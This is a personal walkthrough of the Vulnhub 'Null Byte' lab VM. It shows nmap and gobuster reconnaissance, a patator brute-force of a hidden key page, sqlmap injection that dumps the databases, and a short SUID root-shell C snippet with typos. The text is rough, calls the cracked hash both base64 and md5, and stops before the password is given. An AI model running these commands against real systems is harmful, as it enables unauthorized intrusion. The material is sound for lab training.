NullByte Walkthrough

Here's my attempt to provide walkthroughs for various VM's from Vulnhub & HTB.

Null Byte (Vulnhub)

First off we need to identify the IP address the VM spin up on:

$ nmap -sn 192.168.1.0/24

nmap changed syntax nmap -sP 192.168.1.0/24

We will need the following code if we encounter a SUID binary:

ps.c

# Ain't no code for that yet, sorry
include
int main() 
{ 
setuid(0);
setguid(0); 
execl("/bin/bash", "bash", (char *)NULL); 
return 0; 
}

We identify which port(s) are listening for the server: nmap -O -v -sS 192.168.1.142

We noticed a web server on port 80. What's listening on port 777 - we can utilize netcat to check for the service banner. Ahh it's actually the SSH daemon. Once we have a user and a valid pass we can attempt for a shell on the box using: ssh user@192.168.1.142 -p 777

Let's see what other interesting directories we can find by using dirbuster with a wordlist.

gobuster dir -u http://192.168.1.142 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt

Only 2 directories which appears interesting and not much we can do as directory listing is disabled on the uploads folder and we need credentials for the phpmyadmin page.

Here most people including me didn't know that the next step would be to analyze the default image displayed on the home page.

default page of webserver

The sentence is from an ancient Egyptian proverb. If we run the image (GIF in this case) through a tool called EXIF we can get any text hidden inside the image.

exif text shown

This text string after some consideration is actually a directory on the webserver. On initial looks it's asking for some key. This is where one can only resort to brute force to perhaps see if it's a simple key. Viewing the source code reveals something in the lines of: <!-- this form isn't connected to mysql, password ain't that complex --!>

text hidden inside image reveals a page asking for a key

patator http_fuzz url=http://192.168.1.142/kzMb5nVYJw/index.php method=POST body='key=FILE0' 0=/home/kali/10k-most-common.txt follow=1 -x ignore:fgrep='invalid key'

Next we move on to the next page revealed. we put in a to search. it reveals a user called ramses.

just browsing to or using curl http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= we get the following results: EMP ID :1 EMP NAME : ramses

EMP POSITION :

EMP ID :2 EMP NAME : isis

EMP POSITION : employee

Fetched data successfully

These could be 2 possible users on the system. This is where we will need to check if the page is vulnerable to sql injection. The quickest would be to use sqlmap: sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch= --dbs low and behold we can see all the databases: [10:45:14] [INFO] fetching database names available databases [5]: [] information_schema [] mysql [] performance_schema [] phpmyadmin [*] seth sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch='DESCRIBE phpmyadmin' --dbs --dump

we're presented with a strange hash string next to the username ramses.

we can utilize the following URI to quickly identify the hash type: https://hashes.com/en/tools/hash_identifier as seen below it's actually a base64 encoded string

base64 decode

running the md5 hash through crackstation shows us a possible password:

PreviousCTF WalkthroughsNextFAQ

Last updated

Was this helpful?